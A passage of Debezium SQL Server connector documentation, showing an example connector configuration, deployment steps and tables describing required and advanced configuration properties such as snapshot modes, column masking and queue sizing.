connector writes, the Kafka Connect schema names, and the namespaces of the corresponding Avro schema when the xref:{link-avro-serialization}#avro-serialization[Avro converter] is used.\n\n|9\n|A list of all tables whose changes {prodname} should capture.\n\n|10\n|The list of Kafka brokers that this connector will use to write and recover DDL statements to the database schema history topic.\n\n|11\n|The name of the database schema history topic where the connector will write and recover DDL statements. This topic is for internal use only and should not be used by consumers.\n\n|12\n|The path to the SSL truststore that stores the server's signer certificates.\nThis property is required unless database encryption is disabled (`database.encrypt=false`).\n\n|13\n|The SSL truststore password.\nThis property is required unless database encryption is disabled (`database.encrypt=false`).\n\n|===\n\n. Create your connector instance with Kafka Connect.\n For example, if you saved your `KafkaConnector` resource in the `fulfillment-connector.yaml` file, you would run the following command:\n+\n[source,shell,options=\"nowrap\"]\n----\noc apply -f fulfillment-connector.yaml\n----\n+\nThe preceding command registers `fulfillment-connector` and the connector starts to run against the `testDB` database as defined in the `KafkaConnector` CR.\n\n[id=\"verifying-that-the-debezium-sqlserver-connector-is-running\"]\n=== Verifying that the {prodname} SQL Server connector is running\n\ninclude::{partialsdir}\/modules\/all-connectors\/proc-verifying-the-connector-deployment.adoc[leveloffset=+1]\n\nendif::product[]\n\nifdef::community[]\n[[sqlserver-example-configuration]]\n=== SQL Server connector configuration example\n\nFollowing is an example of the configuration for a connector instance that captures data from a SQL Server server at port 1433 on 192.168.99.100, which we logically name `fullfillment`.\nTypically, you configure the {prodname} SQL Server connector in a JSON file by setting the configuration properties that are available for the connector.\n\nYou can choose to produce events for a subset of the schemas and tables in a database.\nOptionally, you can ignore, mask, or truncate columns that contain sensitive data, that are larger than a specified size, or that you do not need.\n\n[source,json]\n----\n{\n \"name\": \"inventory-connector\", \/\/ <1>\n \"config\": {\n \"connector.class\": \"io.debezium.connector.sqlserver.SqlServerConnector\", \/\/ <2>\n \"database.hostname\": \"192.168.99.100\", \/\/ <3>\n \"database.port\": \"1433\", \/\/ <4>\n \"database.user\": \"sa\", \/\/ <5>\n \"database.password\": \"Password!\", \/\/ <6>\n \"database.names\": \"testDB1,testDB2\", \/\/ <7>\n \"topic.prefix\": \"fullfillment\", \/\/ <8>\n \"table.include.list\": \"dbo.customers\", \/\/ <9>\n \"schema.history.internal.kafka.bootstrap.servers\": \"kafka:9092\", \/\/ <10>\n \"schema.history.internal.kafka.topic\": \"schemahistory.fullfillment\" \/\/ <11>\n \"database.ssl.truststore\": \"path\/to\/trust-store\" \/\/ <12>\n \"database.ssl.truststore.password\": \"password-for-trust-store\" \/\/ <13>\n }\n}\n----\n<1> The name of our connector when we register it with a Kafka Connect service.\n<2> The name of this SQL Server connector class.\n<3> The address of the SQL Server instance.\n<4> The port number of the SQL Server instance.\n<5> The name of the SQL Server user\n<6> The password for the SQL Server user\n<7> The name of the database to capture changes from.\n<8> The topic prefix for the SQL Server instance\/cluster, which forms a namespace and is used in all the names of the Kafka topics to which the connector writes, the Kafka Connect schema names, and the namespaces of the corresponding Avro schema when the xref:{link-avro-serialization}#avro-serialization[Avro converter] is used.\n<9> A list of all tables whose changes {prodname} should capture.\n<10> The list of Kafka brokers that this connector will use to write and recover DDL statements to the database schema history topic.\n<11> The name of the database schema history topic where the connector will write and recover DDL statements. This topic is for internal use only and should not be used by consumers.\n<12> The path to the SSL truststore that stores the server's signer certificates.\nThis property is required unless database encryption is disabled (`database.encrypt=false`).\n<13> The SSL truststore password.\nThis property is required unless database encryption is disabled (`database.encrypt=false`).\nendif::community[]\n\nFor the complete list of the configuration properties that you can set for the {prodname} SQL Server connector, see xref:{link-sqlserver-connector}#sqlserver-connector-properties[SQL Server connector properties].\n\nifdef::community[]\nYou can send this configuration with a `POST` command to a running Kafka Connect service.\nThe service records the configuration and start up the one connector task that performs the following tasks:\n\n* Connects to the SQL Server database.\n* Reads the transaction log.\n* Records change events to Kafka topics.\n\n[[sqlserver-adding-connector-configuration]]\n=== Adding connector configuration\n\nTo start running a {prodname} SQL Server connector, create a connector configuration, and add the configuration to your Kafka Connect cluster.\n\n.Prerequisites\n\n* xref:{link-sqlserver-connector}#setting-up-sqlserver[CDC is enabled on SQL Server].\n* The {prodname} SQL Server connector is installed.\n\n.Procedure\n\n. Create a configuration for the SQL Server connector.\n\n. Use the link:{link-kafka-docs}\/#connect_rest[Kafka Connect REST API] to add that connector configuration to your Kafka Connect cluster.\nendif::community[]\n\n.Results\n\nWhen the connector starts, it xref:{link-sqlserver-connector}#sqlserver-snapshots[performs a consistent snapshot] of the SQL Server databases that the connector is configured for.\nThe connector then starts generating data change events for row-level operations and streaming the change event records to Kafka topics.\n\n\/\/ Type: reference\n\/\/ Title: Descriptions of {prodname} SQL Server connector configuration properties\n\/\/ ModuleID: descriptions-of-debezium-sqlserver-connector-configuration-properties\n[[sqlserver-connector-properties]]\n=== Connector properties\n\nThe {prodname} SQL Server connector has numerous configuration properties that you can use to achieve the right connector behavior for your application.\nMany properties have default values.\n\nInformation about the properties is organized as follows:\n\n* xref:sqlserver-required-connector-configuration-properties[Required connector configuration properties]\n* xref:sqlserver-advanced-connector-configuration-properties[Advanced connector configuration properties]\n* xref:debezium-sqlserver-connector-database-history-configuration-properties[Database schema history connector configuration properties] that control how {prodname} processes events that it reads from the database schema history topic.\n** xref:sqlserver-pass-through-database-history-properties-for-configuring-producer-and-consumer-clients[Pass-through database schema history properties]\n* xref:debezium-sqlserver-connector-pass-through-database-driver-configuration-properties[Pass-through database driver properties] that control the behavior of the database driver.\n\n[id=\"sqlserver-required-connector-configuration-properties\"]\n==== Required {prodname} SQL Server connector configuration properties\n\nThe following configuration properties are _required_ unless a default value is available.\n\n[cols=\"30%a,25%a,45%a\",options=\"header\"]\n|===\n|Property\n|Default\n|Description\n\n|[[sqlserver-property-name]]<<sqlserver-property-name, `+name+`>>\n|No default\n|Unique name for the connector. Attempting to register again with the same name will fail. (This property is required by all Kafka Connect connectors.)\n\n|[[sqlserver-property-connector-class]]<<sqlserver-property-connector-class, `+connector.class+`>>\n|No default\n|The name of the Java class for the connector. Always use a value of `io.debezium.connector.sqlserver.SqlServerConnector` for the SQL Server connector.\n\n|[[sqlserver-property-tasks-max]]<<sqlserver-property-tasks-max, `+tasks.max+`>>\n|`1`\n|Specifies the maximum number of tasks that the connector can use to capture data from the database instance.\nIf the xref:sqlserver-property-database-names[`database.names`] list contains more than one element, increase the value of this property to a number less than or equal to the number of elements in the list.\n\n|[[sqlserver-property-database-hostname]]<<sqlserver-property-database-hostname, `+database.hostname+`>>\n|No default\n|IP address or hostname of the SQL Server database server.\n\n|[[sqlserver-property-database-port]]<<sqlserver-property-database-port, `+database.port+`>>\n|`1433`\n|Integer port number of the SQL Server database server.\n\n|[[sqlserver-property-database-user]]<<sqlserver-property-database-user, `+database.user+`>>\n|No default\n|Username to use when connecting to the SQL Server database server.\nCan be omitted when using Kerberos authentication, which can be configured using xref:debezium-{context}-connector-pass-through-database-driver-configuration-properties[pass-through properties].\n\n|[[sqlserver-property-database-password]]<<sqlserver-property-database-password, `+database.password+`>>\n|No default\n|Password to use when connecting to the SQL Server database server.\n\n|[[sqlserver-property-database-instance]] <<sqlserver-property-database-instance, `+database.instance+`>>\n|No default\n|Specifies the instance name of the link:https:\/\/docs.microsoft.com\/en-us\/sql\/database-engine\/configure-windows\/database-engine-instances-sql-server?view=sql-server-latest#instances[SQL Server named instance].\n\nifdef::community[]\n|[[sqlserver-property-database-names]]<<sqlserver-property-database-names, `+database.names+`>>\n|No default\n|The comma-separated list of the SQL Server database names from which to stream the changes.\nendif::community[]\n|[[sqlserver-property-topic-prefix]]<<sqlserver-property-topic-prefix, `+topic.prefix+`>>\n|No default\n|Topic prefix that provides a namespace for the SQL Server database server that you want {prodname} to capture.\nThe prefix should be unique across all other connectors, since it is used as the prefix for all Kafka topic names that receive records from this connector.\nOnly alphanumeric characters, hyphens, dots and underscores must be used in the database server logical name. +\n +\n[WARNING]\n====\nDo not change the value of this property.\nIf you change the name value, after a restart, instead of continuing to emit events to the original topics, the connector emits subsequent events to topics whose names are based on the new value.\nThe connector is also unable to recover its database schema history topic.\n====\n\n|[[sqlserver-property-schema-include-list]]<<sqlserver-property-schema-include-list, `+schema.include.list+`>>\n|No default\n|An optional, comma-separated list of regular expressions that match names of schemas for which you *want* to capture changes.\nAny schema name not included in `schema.include.list` is excluded from having its changes captured.\nBy default, the connector captures changes for all non-system schemas. +\n\nTo match the name of a schema, {prodname} applies the regular expression that you specify as an _anchored_ regular expression.\nThat is, the specified expression is matched against the entire name string of the schema; it does not match substrings that might be present in a schema name. +\nIf you include this property in the configuration, do not also set the `schema.exclude.list` property.\n\n|[[sqlserver-property-schema-exclude-list]]<<sqlserver-property-schema-exclude-list, `+schema.exclude.list+`>>\n|No default\n|An optional, comma-separated list of regular expressions that match names of schemas for which you *do not* want to capture changes.\nAny schema whose name is not included in `schema.exclude.list` has its changes captured, with the exception of system schemas. +\n\nTo match the name of a schema, {prodname} applies the regular expression that you specify as an _anchored_ regular expression.\nThat is, the specified expression is matched against the entire name string of the schema; it does not match substrings that might be present in a schema name. +\nIf you include this property in the configuration, do not set the `schema.include.list` property.\n\n|[[sqlserver-property-table-include-list]]<<sqlserver-property-table-include-list, `+table.include.list+`>>\n|No default\n|An optional comma-separated list of regular expressions that match fully-qualified table identifiers for tables that you want {prodname} to capture.\nBy default, the connector captures all non-system tables for the designated schemas.\nWhen this property is set, the connector captures changes only from the specified tables.\nEach identifier is of the form _schemaName_._tableName_. +\n\nTo match the name of a table, {prodname} applies the regular expression that you specify as an _anchored_ regular expression.\nThat is, the specified expression is matched against the entire name string of the table; it does not match substrings that might be present in a table name. +\nIf you include this property in the configuration, do not also set the `table.exclude.list` property.\n\n|[[sqlserver-property-table-exclude-list]]<<sqlserver-property-table-exclude-list, `+table.exclude.list+`>>\n|No default\n|An optional comma-separated list of regular expressions that match fully-qualified table identifiers for the tables that you want to exclude from being captured.\n{prodname} captures all tables that are not included in `table.exclude.list`.\nEach identifier is of the form _schemaName_._tableName_. +\n\nTo match the name of a table, {prodname} applies the regular expression that you specify as an _anchored_ regular expression.\nThat is, the specified expression is matched against the entire name string of the table; it does not match substrings that might be present in a table name. +\nIf you include this property in the configuration, do not also set the `table.include.list` property.\n\n|[[sqlserver-property-column-include-list]]<<sqlserver-property-column-include-list, `+column.include.list+`>>\n|_empty string_\n|An optional comma-separated list of regular expressions that match the fully-qualified names of columns that should be included in the change event message values.\nFully-qualified names for columns are of the form _schemaName_._tableName_._columnName_.\nNote that primary key columns are always included in the event's key, even if not included in the value. +\n\nTo match the name of a column, {prodname} applies the regular expression that you specify as an _anchored_ regular expression.\nThat is, the specified expression is matched against the entire name string of the column; it does not match substrings that might be present in a column name. +\nIf you include this property in the configuration, do not also set the `column.exclude.list` property.\n\n|[[sqlserver-property-column-exclude-list]]<<sqlserver-property-column-exclude-list, `+column.exclude.list+`>>\n|_empty string_\n|An optional comma-separated list of regular expressions that match the fully-qualified names of columns that should be excluded from change event message values.\nFully-qualified names for columns are of the form _schemaName_._tableName_._columnName_.\nNote that primary key columns are always included in the event's key, also if excluded from the value. +\n\nTo match the name of a column, {prodname} applies the regular expression that you specify as an _anchored_ regular expression.\nThat is, the specified expression is matched against the entire name string of the column; it does not match substrings that might be present in a column name. +\nIf you include this property in the configuration, do not also set the `column.include.list` property.\n\n|[[sqlserver-property-column-mask-hash]]<<sqlserver-property-column-mask-hash, `column.mask.hash._hashAlgorithm_.with.salt._salt_`>>;\n[[sqlserver-property-column-mask-hash-v2]]<<sqlserver-property-column-mask-hash-v2, `column.mask.hash.v2._hashAlgorithm_.with.salt._salt_`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns.\nFully-qualified names for columns are of the form _`<schemaName>_._<tableName>_._<columnName>`. +\nTo match the name of a column {prodname} applies the regular expression that you specify as an _anchored_ regular expression.\nThat is, the specified expression is matched against the entire name string of the column; the expression does not match substrings that might be present in a column name.\nIn the resulting change event record, the values for the specified columns are replaced with pseudonyms. +\n\nA pseudonym consists of the hashed value that results from applying the specified _hashAlgorithm_ and _salt_.\nBased on the hash function that is used, referential integrity is maintained, while column values are replaced with pseudonyms.\nSupported hash functions are described in the {link-java7-standard-names}[MessageDigest section] of the Java Cryptography Architecture Standard Algorithm Name Documentation. +\n +\nIn the following example, `CzQMA0cB5K` is a randomly selected salt. +\n\n----\ncolumn.mask.hash.SHA-256.with.salt.CzQMA0cB5K = inventory.orders.customerName, inventory.shipment.customerName\n----\n\nIf necessary, the pseudonym is automatically shortened to the length of the column.\nThe connector configuration can include multiple properties that specify different hash algorithms and salts. +\n +\nDepending on the _hashAlgorithm_ used, the _salt_ selected, and the actual data set, the resulting data set might not be completely masked. +\n +\nHashing strategy version 2 should be used to ensure fidelity if the value is being hashed in different places or systems.\n\n|[[sqlserver-property-time-precision-mode]]<<sqlserver-property-time-precision-mode, `+time.precision.mode+`>>\n|`adaptive`\n| Time, date, and timestamps can be represented with different kinds of precision, including: `adaptive` (the default) captures the time and timestamp values exactly as in the database using either millisecond, microsecond, or nanosecond precision values based on the database column's type; or `connect` always represents time and timestamp values using Kafka Connect's built-in representations for Time, Date, and Timestamp, which uses millisecond precision regardless of the database columns' precision. See xref:{link-sqlserver-connector}#sqlserver-temporal-values[temporal values].\n\n|[[sqlserver-property-decimal-handling-mode]]<<sqlserver-property-decimal-handling-mode,`+decimal.handling.mode+`>>\n|`precise`\n|Specifies how the connector should handle values for `DECIMAL` and `NUMERIC` columns: +\n +\n`precise` (the default) represents them precisely using `java.math.BigDecimal` values represented in change events in a binary form. +\n +\n`double` represents them using `double` values, which may result in a loss of precision but is easier to use. +\n +\n`string` encodes values as formatted strings, which is easy to consume but semantic information about the real type is lost.\n\n|[[sqlserver-property-include-schema-changes]]<<sqlserver-property-include-schema-changes, `+include.schema.changes+`>>\n|`true`\n|Boolean value that specifies whether the connector should publish changes in the database schema to a Kafka topic with the same name as the database server ID. Each schema change is recorded with a key that contains the database name and a value that is a JSON structure that describes the schema update. This is independent of how the connector internally records database schema history. The default is `true`.\n\n|[[sqlserver-property-tombstones-on-delete]]<<sqlserver-property-tombstones-on-delete, `+tombstones.on.delete+`>>\n|`true`\n|Controls whether a _delete_ event is followed by a tombstone event. +\n +\n`true` - a delete operation is represented by a _delete_ event and a subsequent tombstone event. +\n +\n`false` - only a _delete_ event is emitted. +\n +\nAfter a source record is deleted, emitting a tombstone event (the default behavior) allows Kafka to completely delete all events that pertain to the key of the deleted row in case {link-kafka-docs}\/#compaction[log compaction] is enabled for the topic.\n\n|[[sqlserver-property-column-truncate-to-length-chars]]<<sqlserver-property-column-truncate-to-length-chars, `column.truncate.to._length_.chars`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns.\nSet this property if you want to truncate the data in a set of columns when it exceeds the number of characters specified by the _length_ in the property name.\nSet `length` to a positive integer value, for example, `column.truncate.to.20.chars`.\n\nThe fully-qualified name of a column observes the following format: `_<schemaName>_._<tableName>_._<columnName>_`.\nTo match the name of a column, {prodname} applies the regular expression that you specify as an _anchored_ regular expression.\nThat is, the specified expression is matched against the entire name string of the column; the expression does not match substrings that might be present in a column name.\n\nYou can specify multiple properties with different lengths in a single configuration.\n\n|[[sqlserver-property-column-mask-with-length-chars]]<<sqlserver-property-column-mask-with-length-chars, `column.mask.with._length_.chars`>>\n|_n\/a_\nFully-qualified names for columns are of the form _schemaName_._tableName_._columnName_.\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns.\nSet this property if you want the connector to mask the values for a set of columns, for example, if they contain sensitive data.\nSet `_length_` to a positive integer to replace data in the specified columns with the number of asterisk (`*`) characters specified by the _length_ in the property name.\nSet _length_ to `0` (zero) to replace data in the specified columns with an empty string.\n\nThe fully-qualified name of a column observes the following format: _schemaName_._tableName_._columnName_.\nTo match the name of a column, {prodname} applies the regular expression that you specify as an _anchored_ regular expression.\nThat is, the specified expression is matched against the entire name string of the column; the expression does not match substrings that might be present in a column name.\n\nYou can specify multiple properties with different lengths in a single configuration.\n\n|[[sqlserver-property-column-propagate-source-type]]<<sqlserver-property-column-propagate-source-type, `+column.propagate.source.type+`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns for which you want the connector to emit extra parameters that represent column metadata.\nWhen this property is set, the connector adds the following fields to the schema of event records:\n\n* `pass:[_]pass:[_]debezium.source.column.type` +\n* `pass:[_]pass:[_]debezium.source.column.length` +\n* `pass:[_]pass:[_]debezium.source.column.scale` +\n\nThese parameters propagate a column's original type name and length (for variable-width types), respectively. +\nEnabling the connector to emit this extra data can assist in properly sizing specific numeric or character-based columns in sink databases.\n\nThe fully-qualified name of a column observes the following format: _schemaName_._tableName_._columnName_. +\nTo match the name of a column, {prodname} applies the regular expression that you specify as an _anchored_ regular expression.\nThat is, the specified expression is matched against the entire name string of the column; the expression does not match substrings that might be present in a column name.\n\n|[[sqlserver-property-datatype-propagate-source-type]]<<sqlserver-property-datatype-propagate-source-type,`+datatype.propagate.source.type+`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that specify the fully-qualified names of data types that are defined for columns in a database.\nWhen this property is set, for columns with matching data types, the connector emits event records that include the following extra fields in their schema:\n\n* `pass:[_]pass:[_]debezium.source.column.type` +\n* `pass:[_]pass:[_]debezium.source.column.length` +\n* `pass:[_]pass:[_]debezium.source.column.scale` +\n\nThese parameters propagate a column's original type name and length (for variable-width types), respectively. +\nEnabling the connector to emit this extra data can assist in properly sizing specific numeric or character-based columns in sink databases.\n\nThe fully-qualified name of a column observes the following format: _schemaName_._tableName_._typeName_. +\nTo match the name of a data type, {prodname} applies the regular expression that you specify as an _anchored_ regular expression.\nThat is, the specified expression is matched against the entire name string of the data type; the expression does not match substrings that might be present in a type name.\n\nFor the list of SQL Server-specific data type names, see the xref:sqlserver-data-types[SQL Server data type mappings].\n\n|[[sqlserver-property-message-key-columns]]<<sqlserver-property-message-key-columns, `+message.key.columns+`>>\n|_n\/a_\n|A list of expressions that specify the columns that the connector uses to form custom message keys for change event records that it publishes to the Kafka topics for specified tables.\n\nBy default, {prodname} uses the primary key column of a table as the message key for records that it emits.\nIn place of the default, or to specify a key for tables that lack a primary key, you can configure custom message keys based on one or more columns. +\n +\nTo establish a custom message key for a table, list the table, followed by the columns to use as the message key.\nEach list entry takes the following format: +\n +\n`_<fully-qualified_tableName>_:__<keyColumn>__,_<keyColumn>_` +\n +\nTo base a table key on multiple column names, insert commas between the column names.\n\nEach fully-qualified table name is a regular expression in the following format: +\n +\n`_<schemaName>_._<tableName>_` +\n +\nThe property can include entries for multiple tables.\nUse a semicolon to separate table entries in the list. +\n +\nThe following example sets the message key for the tables `inventory.customers` and `purchase.orders`: +\n +\n`inventory.customers:pk1,pk2;(.*).purchaseorders:pk3,pk4` +\n +\nFor the table `inventory.customer`, the columns `pk1` and `pk2` are specified as the message key.\nFor the `purchaseorders` tables in any schema, the columns `pk3` and `pk4` server as the message key.\n\nThere is no limit to the number of columns that you use to create custom message keys.\nHowever, it's best to use the minimum number that are required to specify a unique key.\n\n|[[sqlserver-property-binary-handling-mode]]<<sqlserver-property-binary-handling-mode, `+binary.handling.mode+`>>\n|bytes\n|Specifies how binary (`binary`, `varbinary`) columns should be represented in change events, including: `bytes` represents binary data as byte array (default), `base64` represents binary data as base64-encoded String, `base64-url-safe` represents binary data as base64-url-safe-encoded String, `hex` represents binary data as hex-encoded (base16) String\n\n|[[sqlserver-property-schema-name-adjustment-mode]]<<sqlserver-property-schema-name-adjustment-mode,`+schema.name.adjustment.mode+`>>\n|none\n|Specifies how schema names should be adjusted for compatibility with the message converter used by the connector. Possible settings: +\n\n* `none` does not apply any adjustment. +\n* `avro` replaces the characters that cannot be used in the Avro type name with underscore. +\n\n|===\n\n[id=\"sqlserver-advanced-connector-configuration-properties\"]\n==== Advanced SQL Server connector configuration properties\n\nThe following _advanced_ configuration properties have good defaults that will work in most situations and therefore rarely need to be specified in the connector's configuration.\n\n[cols=\"30%a,25%a,45%a\",options=\"header\"]\n|===\n|Property\n|Default\n|Description\n\n|[[sqlserver-property-converters]]<<sqlserver-property-converters, `converters`>>\n|No default\n|Enumerates a comma-separated list of the symbolic names of the {link-prefix}:{link-custom-converters}#custom-converters[custom converter] instances that the connector can use.\nFor example, +\n\n`isbn`\n\nYou must set the `converters` property to enable the connector to use a custom converter.\n\nFor each converter that you configure for a connector, you must also add a `.type` property, which specifies the fully-qualifed name of the class that implements the converter interface.\nThe `.type` property uses the following format: +\n\n`_<converterSymbolicName>_.type` +\n\nFor example, +\n\n isbn.type: io.debezium.test.IsbnConverter\n\nIf you want to further control the behavior of a configured converter, you can add one or more configuration parameters to pass values to the converter.\nTo associate any additional configuration parameter with a converter, prefix the parameter names with the symbolic name of the converter.\nFor example, +\n\n isbn.schema.name: io.debezium.sqlserver.type.Isbn\n\n|[[sqlserver-property-snapshot-mode]]<<sqlserver-property-snapshot-mode, `+snapshot.mode+`>>\n|_initial_\n|A mode for taking an initial snapshot of the structure and optionally data of captured tables.\nOnce the snapshot is complete, the connector will continue reading change events from the database's redo logs.\nThe following values are supported:\n\n* `initial`: Takes a snapshot of structure and data of captured tables; useful if topics should be populated with a complete representation of the data from the captured tables. +\n* `initial_only`: Takes a snapshot of structure and data like `initial` but instead does not transition into streaming changes once the snapshot has completed. +\n* `schema_only`: Takes a snapshot of the structure of captured tables only; useful if only changes happening from now onwards should be propagated to topics.\n\n|[[sqlserver-property-snapshot-include-collection-list]]<<sqlserver-property-snapshot-include-collection-list, `+snapshot.include.collection.list+`>>\n| All tables specified in `table.include.list`\n|An optional, comma-separated list of regular expressions that match the fully-qualified names (`_<dbName>_._<schemaName>_._<tableName>_`) of the tables to include in a snapshot.\nThe specified items must be named in the connector's xref:{context}-property-table-include-list[`table.include.list`] property.\nThis property takes effect only if the connector's xref:sqlserver-property-snapshot-mode[`snapshot.mode`] property is set to a value other than `never`. +\nThis property does not affect the behavior of incremental snapshots. +\n\nTo match the name of a table, {prodname} applies the regular expression that you specify as an _anchored_ regular expression.\nThat is, the specified expression is matched against the entire name string of the table; it does not match substrings that might be present in a table name.\n\n|[[sqlserver-property-snapshot-isolation-mode]]<<sqlserver-property-snapshot-isolation-mode, `+snapshot.isolation.mode+`>>\n|_repeatable_read_\n|Mode to control which transaction isolation level is used and how long the connector locks tables that are designated for capture.\nThe following values are supported:\n\n* `read_uncommitted`\n* `read_committed`\n* `repeatable_read`\n* `snapshot`\n* `exclusive` (`exclusive` mode uses repeatable read isolation level, however, it takes the exclusive lock on all tables\nto be read). +\n\nThe `snapshot`, `read_committed` and `read_uncommitted` modes do not prevent other\ntransactions from updating table rows during initial snapshot.\nThe `exclusive` and `repeatable_read` modes do prevent concurrent updates. +\n\nMode choice also affects data consistency. Only `exclusive` and `snapshot` modes guarantee full consistency, that is, initial\nsnapshot and streaming logs constitute a linear history.\nIn case of `repeatable_read` and `read_committed` modes, it might happen that, for instance, a record added appears\ntwice - once in initial snapshot and once in streaming phase. Nonetheless, that consistency level should do for\ndata mirroring.\nFor `read_uncommitted` there are no data consistency guarantees at all (some data might be lost or corrupted).\n\n|[[sqlserver-property-event-processing-failure-handling-mode]]<<sqlserver-property-event-processing-failure-handling-mode, `+event.processing.failure.handling.mode+`>>\n|`fail`\n| Specifies how the connector should react to exceptions during processing of events.\n`fail` will propagate the exception (indicating the offset of the problematic event), causing the connector to stop. +\n`warn` will cause the problematic event to be skipped and the offset of the problematic event to be logged. +\n`skip` will cause the problematic event to be skipped.\n\n|[[sqlserver-property-poll-interval-ms]]<<sqlserver-property-poll-interval-ms, `+poll.interval.ms+`>>\n|`500`\n|Positive integer value that specifies the number of milliseconds the connector should wait during each iteration for new change events to appear. Defaults to 1000 milliseconds, or 1 second.\n\n|[[sqlserver-property-max-queue-size]]<<sqlserver-property-max-queue-size, `+max.queue.size+`>>\n|`8192`\n|Positive integer value that specifies the maximum number of records that the blocking queue can hold.\nWhen {prodname} reads events streamed from the database, it places the events in the blocking queue before it writes them to Kafka.\nThe blocking queue can provide backpressure for reading change events from the database\nin cases where the connector ingests messages faster than it can write them to Kafka, or when Kafka becomes unavailable.\nEvents that are held in the queue are disregarded when the connector periodically records offsets.\nAlways set the value of `max.queue.size` to be larger than the value of xref:{context}-property-max-batch-size[`max.batch.size`].\n\n|[[sqlserver-property-max-queue-size-in-bytes]]<<sqlserver-property-max-queue-size-in-bytes, `+max.queue.size.in.bytes+`>>\n|`0`\n|A long integer value that specifies the maximum volume of the blocking queue in bytes.\nBy default, volume limits are not specified for the blocking queue.\nTo specify the number of bytes that the queue can consume, set this property to a positive long value. +\nIf xref:sqlserver-property-max-queue-size[`max.queue.size`] is also set, writing to the queue is blocked when the size of the queue reaches the limit specified by either property.\nFor example, if you set `max.queue.size=1000`, and `max.queue.size.in.bytes=5000`, writing to the queue is blocked after the queue contains 1000 records, or after the volume of the records in the queue reaches 5000 bytes.\n\n|[[sqlserver-property-max-batch-size]]<<sqlserver-property-max-batch-size, `+max.batch.size+`>>\n|`2048`\n|Positive integer value that specifies the maximum size of each batch of events that should be processed during each iteration of this connector.\n\n|[[sqlserver-property-heartbeat-interval-ms]]<<sqlserver-property-heartbeat-interval-ms, `+heartbeat.interval.ms+`>>\n|`0`\n|Controls how frequently heartbeat messages are sent. +\nThis property contains an interval in milliseconds that defines how frequently the connector sends messages to a heartbeat topic.\nThe property can be used to confirm whether the connector is still receiving change events from the database.\nYou also should leverage heartbeat messages in cases where only records in non-captured tables are changed for a longer period of time.\nIn such situation the connector would proceed to read the log from the database but never emit any change messages into Kafka,\nwhich in turn means that no offset updates are committed to Kafka.\nThis may result in more change events to be re-sent after a connector restart.\nSet this parameter to `0` to not send heartbeat messages at all. +\nDisabled by default.\n\n|[[sqlserver-property-snapshot-delay-ms]]<<sqlserver-property-snapshot-delay-ms, `+snapshot.delay.ms+`>>\n|No default\n|An interval in milli-seconds that the connector should wait before taking a snapshot after starting up; +\nCan be used to avoid snapshot interruptions when starting multiple connectors in a cluster, which may cause re-balancing of connectors.\n\n|[[sqlserver-property-snapshot-fetch-size]]<<sqlserver-property-snapshot-fetch-size, `+snapshot.fetch.size+`>>\n|`2000`\n|Specifies the maximum number of rows that should be read in one go from each table while taking a snapshot.\nThe connector will read the table contents in multiple batches of this size. Defaults to 2000.\n\n|[[sqlserver-property-query-fetch-size]]<<sqlserver-property-query-fetch-size, `+query.fetch.size+`>>\n|No default\n|Specifies the number of rows that will be fetched for each database round-trip of a given query.\nDefaults to the JDBC driver's default fetch size.\n\n|[[sqlserver-property-snapshot-lock-timeout-ms]]<<sqlserver-property-snapshot-lock-timeout-ms, `+snapshot.lock.timeout.ms+`>>\n|`10000`\n|An integer value that specifies the maximum amount of time (in milliseconds) to wait to obtain table locks when performing a snapshot. If table locks cannot be acquired in this time interval, the snapshot will fail (also see xref:{link-sqlserver-connector}#sqlserver-snapshots[snapshots]). +\nWhen set to `0` the connector will fail immediately when it cannot obtain the lock. Value `-1` indicates infinite waiting.\n\n|[[sqlserver-property-snapshot-select-statement-overrides]]<<sqlserver-property-snapshot-select-statement-overrides, `+snapshot.select.statement.overrides+`>>\n|No default\n|Specifies the table rows to include in a snapshot.\nUse the property if you want a snapshot to include only a subset of the rows in a table.\nThis property affects snapshots only.\nIt does not apply to events that the connector reads from the log.\n\nThe property contains a comma-separated list of fully-qualified table names in the form `_<schemaName>.<tableName>_`. For example, +\n +\n`+\"snapshot.select.statement.overrides\": \"inventory.products,customers.orders\"+` +\n +\nFor each table in the list, add a further configuration property that specifies the `SELECT` statement for the connector to run on the table when it takes a snapshot.\nThe specified `SELECT` statement determines the subset of table rows to include in the snapshot.\nUse the following format to specify the name of this `SELECT` statement property: +\n +\n`snapshot.select.statement.overrides._<schemaName>_._<tableName>_`.\nFor example,\n`snapshot.select.statement.overrides.customers.orders`. +\n +\nExample:\n\nFrom a `customers.orders` table that includes the soft-delete column, `delete_flag`, add the following properties if you want a snapshot to include only those records that are not soft-deleted:\n\n----\n\"snapshot.select.statement.overrides\": \"customer.orders\",\n\"snapshot.select.statement.overrides.customer.orders\": \"SELECT * FROM [customers].[orders] WHERE delete_flag = 0 ORDER BY id DESC\"\n----\n\nIn the resulting snapshot, the connector includes only the records for which `delete_flag = 0`.\nifdef::community[]\n|[[sqlserver-property-source-struct-version]]<<sqlserver-property-source-struct-version, `+source.struct.version+`>>\n|v2\n|Schema version for the `source` block in CDC events; {prodname} 0.10 introduced a few breaking +\nchanges to the structure of the `source` block in order to unify the exposed structure across\nall the connectors. +\nBy setting this option to `v1` the structure used in earlier versions can be produced.\nNote that this setting is not recommended and is planned for removal in a future {prodname} version.\nendif::community[]\n\n|[[sqlserver-property-sanitize-field-names]]<<sqlserver-property-sanitize-field-names, `+sanitize.field.names+`>>\n|`true` when connector configuration explicitly specifies the `key.converter` or `value.converter` parameters to use Avro, otherwise defaults to `false`.\n|Whether field names are sanitized to adhere to Avro naming requirements.\nSee xref:{link-avro-serialization}#avro-naming[Avro naming] for more details.\n\n|[[sqlserver-property-provide-transaction-metadata]]<<sqlserver-property-provide-transaction-metadata, `+provide.transaction.metadata+`>>\n|`false`\n|When set to `true` {prodname} generates events with transaction boundaries and enriches data events envelope with transaction metadata.\n\n|[[sqlserver-property-retriable-restart-connector-wait-ms]]<<sqlserver-property-retriable-restart-connector-wait-ms, `+retriable.restart.connector.wait.ms+`>> +\n|10000 (10 seconds)\n|The number of milli-seconds to wait before restarting a connector after a retriable error occurs.\n\n|[[sqlserver-property-skipped-operations]]<<sqlserver-property-skipped-operations, `+skipped.operations+`>>\n|`t`\n|A comma-separated list of operation types that will be skipped during streaming.\nThe operations include: `c` for inserts\/create, `u` for updates, `d` for deletes, `t` 